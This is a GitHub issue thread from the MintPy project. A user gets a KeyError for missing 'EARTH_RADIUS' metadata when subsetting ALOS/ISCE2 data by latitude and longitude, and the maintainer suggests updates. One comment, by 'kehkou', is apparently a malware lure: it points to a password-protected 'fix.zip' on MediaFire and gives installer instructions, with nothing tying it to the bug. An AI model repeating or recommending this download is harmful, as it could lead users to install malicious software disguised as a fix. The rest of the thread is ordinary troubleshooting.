### ISSUE TITLE
Subset using latlon on alosStack products

### ISSUE THREAD

**Issue by ditafaith** [insarlab/MintPy#1256]
**Description of the problem**

I want to subset ALOS data generated from ISCE2 2.6.3 using latitude and longitude information. 
A file, data.rsc, has been successfully generated in the reference date directory. I also use them in the same environment.
However, it gives an error and asks for information such as 'EARTH_RADIUS' as described below. 

** Command **

smallbaselineApp.py subset_alosStack.txt --dostep load_data

**Full error message**

```
Traceback (most recent call last):
  File "/home/saka/miniconda3/bin/smallbaselineApp.py", line 8, in <module>
    sys.exit(main())
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/cli/smallbaselineApp.py", line 209, in main
    run_smallbaselineApp(inps)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/smallbaselineApp.py", line 1155, in run_smallbaselineApp
    app.run(steps=inps.runSteps)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/smallbaselineApp.py", line 908, in run
    self.run_load_data(sname)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/smallbaselineApp.py", line 176, in run_load_data
    mintpy.cli.load_data.main(iargs)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/cli/load_data.py", line 123, in main
    load_data(inps)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/load_data.py", line 828, in load_data
    iDict = read_subset_box(iDict)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/load_data.py", line 200, in read_subset_box
    pix_box = coord.bbox_geo2radar(geo_box)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/objects/coord.py", line 501, in bbox_geo2radar
    y, x, y_res, x_res = self.geo2radar(lat, lon, print_msg=print_msg)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/objects/coord.py", line 343, in geo2radar
    az_step = ut0.azimuth_ground_resolution(self.src_metadata)
  File "/home/saka/miniconda3/lib/python3.9/site-packages/mintpy/utils/utils0.py", line 232, in azimuth_ground_resolution
    Re = float(atr['EARTH_RADIUS'])
KeyError: 'EARTH_RADIUS'
```

**System information**

* Operating system: Linux
* Python environment: conda
* MintPy version: 1.6.1
* InSAR processor/product: isce2
* Your custom / default template file (if the bug is related to a specific dataset):

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yunjunz** [comment]
The error means some metadata are not successfully extracted during the `load_data` step, please ensure you installed and ran isce2 and mintpy in the same python environment.

I just committed a PR above to be more tolerant of this specific metadata. If you update, re-run and new metadata appearred missing, please do not hesitate to re-open this issue and provide more info, such as, which isce2 stack processor, your file directory structure, and mintpy config files.

**Comment by ditafaith** [comment]
Hi @yunjunz , as I mentioned that I am using same environment and just re-run and get same error, using isce2 2.6.3 and mintpy 1.6.1.
If you mean data.rsc for metadata file, then it has been created. 
[conf.txt](https://github.com/user-attachments/files/16822786/conf.txt)
[data.rsc.txt](https://github.com/user-attachments/files/16822788/data.rsc.txt)

**Comment by yunjunz** [comment]
Update your mintpy to the latest development version and rerun.

**Comment by ditafaith** [comment]
Actually, I am using 1.6.1 version and it is installed since 3 weeks ago. However, I will follow your suggestion and back to you.

**Comment by ditafaith** [comment]
Hello @yunjunz, I've update it, however, the error still comes.
> Update your mintpy to the latest development version and rerun.

**Comment by ditafaith** [comment]
Hi @yunjunz, I'd be happy to provide more information to help you solve this matter, such as sharing you privately.
Also, I didn't find the label on colorbar is changed using `--cbar-label`. I think better to use _**Cumulative Displacement**_, instead of Displacement on the label.

**Comment by ditafaith** [comment]
> Update your mintpy to the latest development version and rerun.

Hi @yunjunz I would be glad if there is any insight from you.
The error still exists even though I ran using the latest version 1.6.1
